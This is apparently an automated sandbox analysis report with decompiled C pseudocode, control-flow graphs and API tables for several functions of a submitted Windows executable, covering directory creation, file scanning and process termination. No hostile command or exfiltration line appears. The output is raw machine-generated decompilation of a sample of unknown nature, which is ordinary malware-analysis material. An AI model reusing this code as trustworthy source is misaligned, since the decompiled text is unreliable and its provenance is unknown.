                              • Opcode ID: 4eafd060168cf62d967f11a2e06bed2b646f89a5601815e0617f26fec8bbc86a
                              • Instruction ID: d43b38567734cbd3d280cef04a8de17ccbe463ec1fdb7709e9180388f705ec22
                              • Opcode Fuzzy Hash: 4eafd060168cf62d967f11a2e06bed2b646f89a5601815e0617f26fec8bbc86a
                              • Instruction Fuzzy Hash: A5D17070900259EFCF05DFA4C944ADEBB74BF14318F20846EF845BB291CB78AA45CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 79%
                              			E00408F0A(intOrPtr __ecx) {
                              				intOrPtr _t105;
                              				intOrPtr _t113;
                              				void* _t115;
                              				intOrPtr _t118;
                              				long _t123;
                              				intOrPtr* _t131;
                              				void* _t137;
                              				void* _t141;
                              				intOrPtr* _t151;
                              				signed int _t157;
                              				intOrPtr _t192;
                              				intOrPtr* _t196;
                              				long _t198;
                              				void* _t199;
                              
                              				E00413954(E00419BC6, _t199);
                              				_t192 = __ecx;
                              				_t157 = 0;
                              				_push(0x90);
                              				 *((intOrPtr*)(__ecx + 0x28)) = 0;
                              				 *((intOrPtr*)(_t199 - 0x14)) = __ecx;
                              				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
                              				_t105 = E00403A76();
                              				 *((intOrPtr*)(_t199 - 0x18)) = _t105;
                              				 *(_t199 - 4) = 0;
                              				if(_t105 == 0) {
                              					_t196 = 0;
                              					__eflags = 0;
                              				} else {
                              					_t196 = E00409184(_t105);
                              				}
                              				 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
                              				 *((intOrPtr*)(_t199 - 0x10)) = _t196;
                              				if(_t196 != _t157) {
                              					 *((intOrPtr*)( *_t196 + 4))(_t196);
                              				}
                              				 *((intOrPtr*)(_t196 + 0x7c)) =  *((intOrPtr*)(_t199 + 0x1c));
                              				 *(_t199 - 4) = 1;
                              				 *(_t199 - 0x3c) = _t157;
                              				 *(_t199 - 0x38) = _t157;
                              				 *(_t199 - 0x34) = _t157;
                              				E00402170(_t199 - 0x3c, 3);
                              				 *(_t199 - 4) = 2;
                              				 *(_t199 - 0x24) = _t157;
                              				 *(_t199 - 0x20) = _t157;
                              				 *(_t199 - 0x1c) = _t157;
                              				E00402170(_t199 - 0x24, 3);
                              				 *(_t199 - 4) = 3;
                              				 *(_t199 - 0x30) = _t157;
                              				 *(_t199 - 0x2c) = _t157;
                              				 *(_t199 - 0x28) = _t157;
                              				E00402170(_t199 - 0x30, 3);
                              				 *(_t199 - 4) = 4;
                              				if( *((intOrPtr*)(_t199 + 0x14)) != _t157 ||  *((intOrPtr*)(_t199 + 0x10)) != _t157) {
                              					_t58 = _t196 + 8; // 0x8
                              					 *((intOrPtr*)( *((intOrPtr*)(_t196 + 8)) + 0xc))(_t58,  *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))));
                              					goto L13;
                              				} else {
                              					_push(_t199 + 0x1c);
                              					if(E00404E76( *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))), _t199 - 0x3c) != 0) {
                              						_t137 = E00401E3A(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
                              						 *(_t199 - 4) = 5;
                              						E00401D7A(_t199 - 0x24, _t137);
                              						 *(_t199 - 4) = 4;
                              						E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
                              						_t141 = E00401E19(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
                              						 *(_t199 - 4) = 6;
                              						E00401D7A(_t199 - 0x30, _t141);
                              						 *(_t199 - 4) = 4;
                              						E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
                              						_push(_t199 - 0x30);
                              						_push(_t199 - 0x24);
                              						E004092E9(_t196, __eflags); // executed
                              						L13:
                              						_push( *((intOrPtr*)(_t199 - 0x10)));
                              						_push( *((intOrPtr*)(_t199 + 0x18)));
                              						_t62 = _t199 + 0x14; // 0x414be4
                              						_push( *_t62);
                              						_push( *((intOrPtr*)(_t199 + 0x10)));
                              						_push( *((intOrPtr*)(_t199 + 0xc)));
                              						_push( *((intOrPtr*)(_t199 + 8)));
                              						_t113 = E00408A3B(_t192); // executed
                              						__eflags = _t113 - _t157;
                              						 *((intOrPtr*)(_t199 + 0x18)) = _t113;
                              						if(_t113 == _t157) {
                              							_push(_t199 - 0x30);
                              							_t115 = E00402634(_t199 - 0x48, _t199 - 0x24);
                              							_t193 = _t192 + 0x14;
                              							_push(_t115);
                              							 *(_t199 - 4) = 7;
                              							E00403998(_t192 + 0x14);
                              							 *(_t199 - 4) = 4;
                              							E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
                              							__eflags =  *((intOrPtr*)(_t196 + 0x70)) - _t157;
                              							if( *((intOrPtr*)(_t196 + 0x70)) > _t157) {
                              								do {
                              									_push( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x74)) + _t157 * 4)));
                              									_push(E00402634(_t199 - 0x48, _t199 - 0x24));
                              									 *(_t199 - 4) = 8;
                              									E00403998(_t193);
                              									 *(_t199 - 4) = 4;
                              									E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
                              									_t157 = _t157 + 1;
                              									__eflags = _t157 -  *((intOrPtr*)(_t196 + 0x70));
                              								} while (_t157 <  *((intOrPtr*)(_t196 + 0x70)));
                              							}
                              							_t118 =  *((intOrPtr*)(_t199 - 0x14));
                              							 *((intOrPtr*)(_t118 + 0x28)) =  *((intOrPtr*)(_t196 + 0x88));
                              							 *((intOrPtr*)(_t118 + 0x2c)) =  *((intOrPtr*)(_t196 + 0x8c));
                              							E00403A9C( *(_t199 - 0x30));
                              							E00403A9C( *(_t199 - 0x24));
                              							E00403A9C( *(_t199 - 0x3c));
                              							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
                              							E00403800(_t199 - 0x10);
                              							_t123 = 0;
                              							__eflags = 0;
                              						} else {
                              							E00403A9C( *(_t199 - 0x30));
                              							E00403A9C( *(_t199 - 0x24));
                              							E00403A9C( *(_t199 - 0x3c));
                              							_t131 =  *((intOrPtr*)(_t199 - 0x10));
                              							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
                              							__eflags = _t131 - _t157;
                              							if(_t131 != _t157) {
                              								 *((intOrPtr*)( *_t131 + 8))(_t131);
                              							}
                              							_t123 =  *((intOrPtr*)(_t199 + 0x18));
                              						}
                              					} else {
                              						_t198 = GetLastError();
                              						E00403A9C( *(_t199 - 0x30));
                              						E00403A9C( *(_t199 - 0x24));
                              						E00403A9C( *(_t199 - 0x3c));
                              						_t151 =  *((intOrPtr*)(_t199 - 0x10));
                              						 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
                              						if(_t151 != _t157) {
                              							 *((intOrPtr*)( *_t151 + 8))(_t151);
                              						}
                              						_t123 = _t198;
                              					}
                              				}
                              				 *[fs:0x0] =  *((intOrPtr*)(_t199 - 0xc));
                              				return _t123;
                              			}


















                              APIs
                              • __EH_prolog.LIBCMT ref: 00408F0F
                              • GetLastError.KERNEL32(?,00000003,00000003,00000003,?,?,00000000), ref: 00408FD3
                                • Part of subcall function 00409184: __EH_prolog.LIBCMT ref: 00409189
                                • Part of subcall function 004092E9: __EH_prolog.LIBCMT ref: 004092EE
                                • Part of subcall function 00408A3B: __EH_prolog.LIBCMT ref: 00408A40
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$ErrorLast
                              • String ID: KA
                              • API String ID: 2901101390-4133974868
                              • Opcode ID: b6f1e9e35d0993485aac3e7f0f886f6fddc444a62bfdbd27778ba704e600b33b
                              • Instruction ID: 1ffdda1e280707f1620b0bff2a1c5a648dc862d45b7bd7d33f28712355ced64d
                              • Opcode Fuzzy Hash: b6f1e9e35d0993485aac3e7f0f886f6fddc444a62bfdbd27778ba704e600b33b
                              • Instruction Fuzzy Hash: 7C81677190020AABCF01EFA5C885ADEBBB5BF18318F14416EF455B32A2CB399A05CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 941 4049dd-404a02 call 413954 call 401c80 946 404a04-404a07 941->946 947 404a4a-404a59 call 401ce1 941->947 949 404a0b-404a0e 946->949 953 404a5d-404a67 call 40499c 947->953 951 404a10-404a12 949->951 952 404a18-404a1c 949->952 954 404a14-404a16 951->954 955 404a1e 951->955 956 404a21-404a23 952->956 961 404b42-404b49 call 401d7a 953->961 962 404a6d-404a78 GetLastError 953->962 954->949 955->956 956->947 958 404a25-404a2a 956->958 958->947 960 404a2c-404a2f 958->960 963 404a31-404a36 960->963 964 404a3f-404a45 call 4023ee 960->964 974 404b4e-404b51 961->974 966 404aea-404afc call 402ee1 call 405841 962->966 967 404a7a-404a7f 962->967 963->964 969 404a38-404a3a 963->969 964->947 993 404b01-404b03 966->993 971 404bb2 967->971 972 404a85-404a88 967->972 970 404bc0-404bc6 call 403a9c 969->970 990 404bc7-404bd7 970->990 978 404bb4-404bbf call 403a9c 971->978 976 404a8c-404a8f 972->976 979 404b57-404b5a 974->979 980 404bd8-404bda 974->980 984 404a91-404a93 976->984 985 404a99-404a9f 976->985 978->970 982 404b5e-404b64 979->982 980->978 988 404b66-404b69 982->988 989 404b6f-404b75 982->989 991 404aa1 984->991 992 404a95-404a97 984->992 994 404aa4-404aa6 985->994 996 404b77 988->996 997 404b6b-404b6d 988->997 998 404b7a-404b7c 989->998 991->994 992->976 999 404b05-404b07 993->999 1000 404b09-404b11 993->1000 994->971 995 404aac 994->995 995->971 1004 404ab2-404ab8 995->1004 996->998 997->982 1005 404b81-404bb0 call 401e3a call 40499c call 403a9c 998->1005 1006 404b7e 998->1006 1001 404b15-404b30 call 403a9c * 3 999->1001 1002 404b13 1000->1002 1003 404b35-404b41 call 403a9c 1000->1003 1001->990 1002->1001 1003->961 1004->971 1008 404abe-404ae5 call 401e3a call 401d7a call 403a9c 1004->1008 1005->971 1005->974 1006->1005 1008->953
                              C-Code - Quality: 98%
                              			E004049DD(void* __ecx) {
                              				signed int _t64;
                              				intOrPtr* _t70;
                              				intOrPtr* _t74;
                              				signed char _t75;
                              				long _t78;
                              				signed int _t80;
                              				signed char _t82;
                              				signed int _t87;
                              				intOrPtr* _t88;
                              				void* _t92;
                              				signed int _t96;
                              				signed int _t98;
                              				signed int _t102;
                              				signed int _t109;
                              				signed int _t116;
                              				intOrPtr _t123;
                              				intOrPtr _t128;
                              				intOrPtr _t129;
                              				intOrPtr _t130;
                              				void* _t132;
                              				signed int _t135;
                              				void* _t138;
                              
                              				E00413954(E004195A0, _t138);
                              				E00401C80(_t138 - 0x18, __ecx);
                              				_t2 = _t138 - 0x14; // 0x414be4
                              				_t109 =  *_t2;
                              				 *(_t138 - 4) =  *(_t138 - 4) & 0x00000000;
                              				_t132 = 0x5c;
                              				if(_t109 == 0) {
                              					L13:
                              					E00401CE1(_t138 - 0x24, _t138 - 0x18);
                              					_t14 = _t138 - 0x14; // 0x414be4
                              					_t135 =  *_t14;
                              					 *(_t138 - 4) = 1;
                              					while(1) {
                              						L14:
                              						_t64 = E0040499C( *((intOrPtr*)(_t138 - 0x18))); // executed
                              						__eflags = _t64;
                              						if(_t64 != 0) {
                              							break;
                              						}
                              						_t78 = GetLastError();
                              						__eflags = _t78 - 0xb7;
                              						if(_t78 == 0xb7) {
                              							E00402EE1(_t138 - 0x40);
                              							_push( *((intOrPtr*)(_t138 - 0x18)));
                              							 *(_t138 - 4) = 2;
                              							_t80 = E00405841(_t138 - 0x68, _t128); // executed
                              							__eflags = _t80;
                              							if(_t80 != 0) {
                              								_t82 =  *(_t138 - 0x48) >> 4;
                              								__eflags = _t82 & 0x00000001;
                              								if((_t82 & 0x00000001) != 0) {
                              									 *(_t138 - 4) = 1;
                              									E00403A9C( *((intOrPtr*)(_t138 - 0x40)));
                              									break;
                              								} else {
                              									_t102 = 0;
                              									__eflags = 0;
                              									goto L31;
                              								}
                              							} else {
                              								_t102 = 1;
                              								L31:
                              								E00403A9C( *((intOrPtr*)(_t138 - 0x40)));
                              								E00403A9C( *((intOrPtr*)(_t138 - 0x24)));
                              								E00403A9C( *((intOrPtr*)(_t138 - 0x18)));
                              							}
                              						} else {
                              							_t17 = _t138 - 0x14; // 0x414be4
                              							_t87 =  *_t17;
                              							__eflags = _t87;
                              							if(_t87 == 0) {
                              								L44:
                              								_t102 = 0;
                              								__eflags = 0;
                              								L45:
                              								E00403A9C( *((intOrPtr*)(_t138 - 0x24)));
                              								_t129 =  *((intOrPtr*)(_t138 - 0x18));
                              								goto L46;
                              							} else {
                              								_t123 =  *((intOrPtr*)(_t138 - 0x18));
                              								_t88 = _t123 + _t87 * 2 - 2;
                              								while(1) {
                              									__eflags =  *_t88 - _t132;
                              									if( *_t88 == _t132) {
                              										break;
                              									}
                              									__eflags = _t88 - _t123;
                              									if(_t88 == _t123) {
                              										_t135 = _t135 | 0xffffffff;
                              										__eflags = _t135;
                              									} else {
                              										_t88 = _t88;
                              										continue;
                              									}
                              									L23:
                              									__eflags = _t135;
                              									if(__eflags < 0 || __eflags == 0) {
                              										goto L44;
                              									} else {
                              										__eflags =  *((short*)(_t123 + _t135 * 2 - 2)) - 0x3a;
                              										if( *((short*)(_t123 + _t135 * 2 - 2)) == 0x3a) {
                              											goto L44;
                              										} else {
                              											_t92 = E00401E3A(_t138 - 0x18, _t138 - 0x30, _t135);
                              											 *(_t138 - 4) = 3;
                              											E00401D7A(_t138 - 0x18, _t92);
                              											 *(_t138 - 4) = 1;
                              											E00403A9C( *((intOrPtr*)(_t138 - 0x30)));
                              											goto L14;
                              										}
                              									}
                              									goto L47;
                              								}
                              								_t135 = _t88 - _t123 >> 1;
                              								goto L23;
                              							}
                              						}
                              						goto L47;
                              					}
                              					E00401D7A(_t138 - 0x18, _t138 - 0x24);
                              					while(1) {
                              						L34:
                              						_t45 = _t138 - 0x14; // 0x414be4
                              						__eflags = _t135 -  *_t45;
                              						if(_t135 >=  *_t45) {
                              							break;
                              						}
                              						_t130 =  *((intOrPtr*)(_t138 - 0x18));
                              						_t70 = _t130 + 2 + _t135 * 2;
                              						while(1) {
                              							_t116 =  *_t70;
                              							__eflags = _t116 - _t132;
                              							if(_t116 == _t132) {
                              								break;
                              							}
                              							__eflags = _t116;
                              							if(_t116 == 0) {
                              								_t135 = _t135 | 0xffffffff;
                              								__eflags = _t135;
                              							} else {
                              								_t70 = _t70 + 2;
                              								continue;
                              							}
                              							L41:
                              							__eflags = _t135;
                              							if(_t135 < 0) {
                              								_t50 = _t138 - 0x14; // 0x414be4
                              								_t135 =  *_t50;
                              							}
                              							_t74 = E00401E3A(_t138 - 0x18, _t138 - 0x30, _t135);
                              							 *(_t138 - 4) = 4;
                              							_t75 = E0040499C( *_t74);
                              							 *(_t138 - 4) = 1;
                              							asm("sbb bl, bl");
                              							E00403A9C( *((intOrPtr*)(_t138 - 0x30)));
                              							__eflags =  ~_t75 + 1;
                              							if( ~_t75 + 1 == 0) {
                              								goto L34;
                              							} else {
                              								goto L44;
                              							}
                              							goto L45;
                              						}
                              						_t135 = _t70 - _t130 >> 1;
                              						goto L41;
                              					}
                              					_t102 = 1;
                              					goto L45;
                              				} else {
                              					_t128 =  *((intOrPtr*)(_t138 - 0x18));
                              					_t96 = _t128 + _t109 * 2 - 2;
                              					while( *_t96 != _t132) {
                              						if(_t96 == _t128) {
                              							_t98 = _t96 | 0xffffffff;
                              							__eflags = _t98;
                              						} else {
                              							_t96 = _t96;
                              							continue;
                              						}
                              						L7:
                              						__eflags = _t98;
                              						if(_t98 <= 0) {
                              							goto L13;
                              						} else {
                              							__eflags = _t98 - _t109 - 1;
                              							if(_t98 != _t109 - 1) {
                              								goto L13;
                              							} else {
                              								__eflags = _t109 - 3;
                              								if(_t109 != 3) {
                              									L12:
                              									E004023EE(_t138 - 0x18, _t98, 1);
                              									goto L13;
                              								} else {
                              									__eflags =  *((short*)(_t128 + 2)) - 0x3a;
                              									if( *((short*)(_t128 + 2)) != 0x3a) {
                              										goto L12;
                              									} else {
                              										_t102 = 1;
                              										L46:
                              										E00403A9C(_t129);
                              									}
                              								}
                              							}
                              						}
                              						goto L47;
                              					}
                              					_t98 = _t96 - _t128 >> 1;
                              					goto L7;
                              				}
                              				L47:
                              				 *[fs:0x0] =  *((intOrPtr*)(_t138 - 0xc));
                              				return _t102;
                              			}


























                              APIs
                              • __EH_prolog.LIBCMT ref: 004049E2
                              • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00404A6D
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: ErrorH_prologLast
                              • String ID: KA
                              • API String ID: 1057991267-4133974868
                              • Opcode ID: 17c35cf8e9a7414348f32529b6738b26766f9c2a34e08f9ad75d03fbdc4fbc32
                              • Instruction ID: ea88e0dbf276ed2b61ac96949af9a946984d9cda694903235269fb2a0f105987
                              • Opcode Fuzzy Hash: 17c35cf8e9a7414348f32529b6738b26766f9c2a34e08f9ad75d03fbdc4fbc32
                              • Instruction Fuzzy Hash: 14512671A4010A9ACF10EBA0C945AFFBB74EF91318F14017BE601732D1D779AE46CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1028 401af4-401b2e call 413954 call 413cc0 call 405b6d 1035 401b30-401b3e call 405975 1028->1035 1036 401b43-401b49 1028->1036 1044 401c6b-401c78 1035->1044 1038 401b57-401b60 1036->1038 1039 401b4b-401b55 1036->1039 1041 401b62-401b6c 1038->1041 1042 401b6e-401b7b 1038->1042 1039->1038 1039->1039 1041->1041 1041->1042 1043 401b7f-401b96 call 405bca 1042->1043 1046 401b9b-401b9d 1043->1046 1047 401ba3-401ba8 1046->1047 1048 401c5a 1046->1048 1049 401c56-401c58 1047->1049 1050 401bae-401bb0 1047->1050 1051 401c5c-401c6a call 405975 1048->1051 1049->1051 1052 401bb6-401bbc 1050->1052 1051->1044 1054 401bf0-401bf5 1052->1054 1055 401bbe-401bc3 1052->1055 1057 401c16-401c3b call 413980 1054->1057 1058 401bf7-401c08 call 4134d0 1054->1058 1055->1057 1059 401bc5-401bd6 call 4134d0 1055->1059 1068 401c4a-401c54 1057->1068 1069 401c3d-401c44 1057->1069 1066 401c0a-401c14 1058->1066 1067 401bec-401bee 1058->1067 1059->1049 1070 401bd8-401bdf 1059->1070 1066->1052 1067->1052 1068->1051 1069->1068 1071 401b7d 1069->1071 1070->1048 1072 401be1-401be7 call 401ee5 1070->1072 1071->1043 1072->1067
                              C-Code - Quality: 93%
                              			E00401AF4(void* __ecx, intOrPtr __edx, void* __eflags) {
                              				signed char** _t64;
                              				char* _t67;
                              				void* _t71;
                              				signed int _t73;
                              				intOrPtr _t74;
                              				void* _t75;
                              				void* _t81;
                              				void* _t83;
                              				char _t84;
                              				signed int _t89;
                              				signed int _t91;
                              				void* _t92;
                              				signed int _t103;
                              				void* _t107;
                              				void* _t109;
                              				void* _t110;
                              				void* _t112;
                              
                              				_t92 = __ecx;
                              				E00413954(E004190C8, _t110);
                              				E00413CC0(0x1024, __ecx);
                              				_t64 =  *(_t110 + 0xc);
                              				_t103 = 0;
                              				_t64[1] = 0;
                              				 *((intOrPtr*)(_t110 - 0x30)) = __edx;
                              				 *( *_t64) =  *( *_t64) & 0x00000000;
                              				 *(_t110 - 0x1c) =  *(_t110 - 0x1c) | 0xffffffff;
                              				 *(_t110 - 4) = 0;
                              				if(E00405B6D(_t92) != 0) {
                              					 *((intOrPtr*)(_t110 - 0x14)) = 0;
                              					if( *((char*)(__edx)) != 0) {
                              						do {
                              							 *((intOrPtr*)(_t110 - 0x14)) =  *((intOrPtr*)(_t110 - 0x14)) + 1;
                              						} while ( *((char*)( *((intOrPtr*)(_t110 - 0x14)) + __edx)) != 0);
                              					}
                              					_t67 =  *((intOrPtr*)(_t110 + 8));
                              					 *((intOrPtr*)(_t110 - 0x18)) = _t103;
                              					if( *_t67 != 0) {
                              						do {
                              							 *((intOrPtr*)(_t110 - 0x18)) =  *((intOrPtr*)(_t110 - 0x18)) + 1;
                              						} while ( *((char*)( *((intOrPtr*)(_t110 - 0x18)) + _t67)) != 0);
                              					}
                              					_t107 = 0;
                              					 *(_t110 - 0xd) =  *(_t110 - 0xd) & 0x00000000;
                              					 *((intOrPtr*)(_t110 - 0x24)) = _t103;
                              					 *((intOrPtr*)(_t110 - 0x20)) = _t103;
                              					while(1) {
                              						L8:
                              						_t71 = E00405BCA(_t110 - 0x1c, _t110 + _t107 - 0x1030, 0x1000 - _t107, _t110 - 0x28); // executed
                              						if(_t71 == 0) {
                              							break;
                              						}
                              						_t74 =  *((intOrPtr*)(_t110 - 0x28));
                              						if(_t74 == _t103) {
                              							L23:
                              							_t89 = 1;
                              						} else {
                              							_t109 = _t107 + _t74;
                              							_t91 = _t110 - 0x1030;
                              							while(1) {
                              								_t75 = _t109;
                              								if( *(_t110 - 0xd) != 0) {
                              								}
                              								L12:
                              								if(_t103 > _t75 -  *((intOrPtr*)(_t110 - 0x18))) {
                              									L20:
                              									_t107 = _t109 - _t103;
                              									 *((intOrPtr*)(_t110 - 0x24)) =  *((intOrPtr*)(_t110 - 0x24)) + _t103;
                              									asm("adc dword [ebp-0x20], 0x0");
                              									E00413980(_t110 - 0x1030, _t110 + _t103 - 0x1030, _t107);
                              									_t112 = _t112 + 0xc;
                              									if( *((intOrPtr*)(_t110 - 0x20)) > 0 ||  *((intOrPtr*)(_t110 - 0x24)) > 0x100000) {
                              										_t89 = _t91 & 0xffffff00 | ( *(_t110 + 0xc))[1] == 0x00000000;
                              									} else {
                              										_t103 = 0;
                              										goto L8;
                              									}
                              								} else {
                              									_t83 = E004134D0(_t91,  *((intOrPtr*)(_t110 + 8)),  *((intOrPtr*)(_t110 - 0x18)));
                              									_t112 = _t112 + 0xc;
                              									if(_t83 == 0) {
                              										goto L23;
                              									} else {
                              										_t84 =  *_t91;
                              										 *((char*)(_t110 - 0x2c)) = _t84;
                              										if(_t84 == 0) {
                              											goto L24;
                              										} else {
                              											E00401EE5( *(_t110 + 0xc),  *((intOrPtr*)(_t110 - 0x2c)));
                              											L16:
                              											_t103 = _t103 + 1;
                              											_t91 = _t91 + 1;
                              											while(1) {
                              												_t75 = _t109;
                              												if( *(_t110 - 0xd) != 0) {
                              												}
                              												goto L17;
                              											}
                              											goto L12;
                              										}
                              									}
                              								}
                              								goto L25;
                              								L17:
                              								_t39 = _t110 - 0x14; // 0x414be4
                              								if(_t103 > _t75 -  *_t39) {
                              									goto L20;
                              								} else {
                              									_t40 = _t110 - 0x14; // 0x414be4
                              									_t81 = E004134D0(_t91,  *((intOrPtr*)(_t110 - 0x30)),  *_t40);
                              									_t112 = _t112 + 0xc;
                              									if(_t81 != 0) {
                              										goto L16;
                              									} else {
                              										_t103 = _t103 +  *((intOrPtr*)(_t110 - 0x14));
                              										_t91 = _t91 +  *((intOrPtr*)(_t110 - 0x14));
                              										 *(_t110 - 0xd) = 1;
                              										continue;
                              									}
                              									goto L26;
                              								}
                              								goto L25;
                              							}
                              						}
                              						L25:
                              						 *(_t110 - 4) =  *(_t110 - 4) | 0xffffffff;
                              						E00405975(_t110 - 0x1c);
                              						_t73 = _t89;
                              						goto L26;
                              					}
                              					L24:
                              					_t89 = 0;
                              					goto L25;
                              				} else {
                              					 *(_t110 - 4) =  *(_t110 - 4) | 0xffffffff;
                              					E00405975(_t110 - 0x1c);
                              					_t73 = 0;
                              				}
                              				L26:
                              				 *[fs:0x0] =  *((intOrPtr*)(_t110 - 0xc));
                              				return _t73;
                              			}





















                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: KA$KA
                              • API String ID: 3519838083-594506476
                              • Opcode ID: 5b0f55770afa12d36702e97ef3d2b3e48a7f6e08a164a6161b21258ea26ce881
                              • Instruction ID: 3866b3b7da3d7396f9922ec017f7e66c93d936b9f161a27d318f0a0663603341
                              • Opcode Fuzzy Hash: 5b0f55770afa12d36702e97ef3d2b3e48a7f6e08a164a6161b21258ea26ce881
                              • Instruction Fuzzy Hash: 7451CF72D042199FDF11DFA4C940BEEBBB4AF05394F14416AE851732E2E3789E85CB68
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1074 416cb8-416cc7 call 416d5d 1077 416cc9-416cd4 GetCurrentProcess TerminateProcess 1074->1077 1078 416cda-416cf0 1074->1078 1077->1078 1079 416cf2-416cf9 1078->1079 1080 416d2e-416d42 call 416d6f 1078->1080 1081 416cfb-416d07 1079->1081 1082 416d1d-416d2d call 416d6f 1079->1082 1091 416d44-416d4a call 416d66 1080->1091 1092 416d4b-416d55 ExitProcess 1080->1092 1084 416d09-416d0d 1081->1084 1085 416d1c 1081->1085 1082->1080 1088 416d11-416d1a 1084->1088 1089 416d0f 1084->1089 1085->1082 1088->1084 1088->1085 1089->1088
                              C-Code - Quality: 80%
                              			E00416CB8(void* __esi, int _a4, intOrPtr _a8, char _a12) {
                              				intOrPtr _t9;
                              				intOrPtr* _t11;
                              				char _t16;
                              				intOrPtr _t22;
                              				intOrPtr _t23;
                              				void* _t24;
                              				intOrPtr* _t25;
                              				void* _t27;
                              				void* _t32;
                              
                              				_t24 = __esi;
                              				E00416D5D();
                              				_t23 = 1;
                              				_t27 =  *0x423400 - _t23; // 0x1
                              				if(_t27 == 0) {
                              					TerminateProcess(GetCurrentProcess(), _a4);
                              				}
                              				_t16 = _a12;
                              				 *0x4233fc = _t23;
                              				 *0x4233f8 = _t16;
                              				if(_a8 == 0) {
                              					_t9 =  *0x425a10; // 0x20504c8
                              					if(_t9 != 0) {
                              						_t22 =  *0x425a0c; // 0x20504d0
                              						_push(_t24);
                              						_t4 = _t22 - 4; // 0x20504cc
                              						_t25 = _t4;
                              						if(_t25 >= _t9) {
                              							do {
                              								_t11 =  *_t25;
                              								if(_t11 != 0) {
                              									 *_t11();
                              								}
                              								_t25 = _t25 - 4;
                              								_t32 = _t25 -  *0x425a10; // 0x20504c8
                              							} while (_t32 >= 0);
                              						}
                              					}
                              					E00416D6F(0x420044, 0x420048);
                              				}
                              				E00416D6F(0x42004c, 0x420054);
                              				if(_t16 == 0) {
                              					 *0x423400 = _t23; // executed
                              					ExitProcess(_a4);
                              				}
                              				return E00416D66();
                              			}













                              APIs
                              • GetCurrentProcess.KERNEL32(?,?,00416CA3,?,00000000,00000000,00414BED,00000000,00000000), ref: 00416CCD
                              • TerminateProcess.KERNEL32(00000000,?,00416CA3,?,00000000,00000000,00414BED,00000000,00000000), ref: 00416CD4
                              • ExitProcess.KERNEL32 ref: 00416D55
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
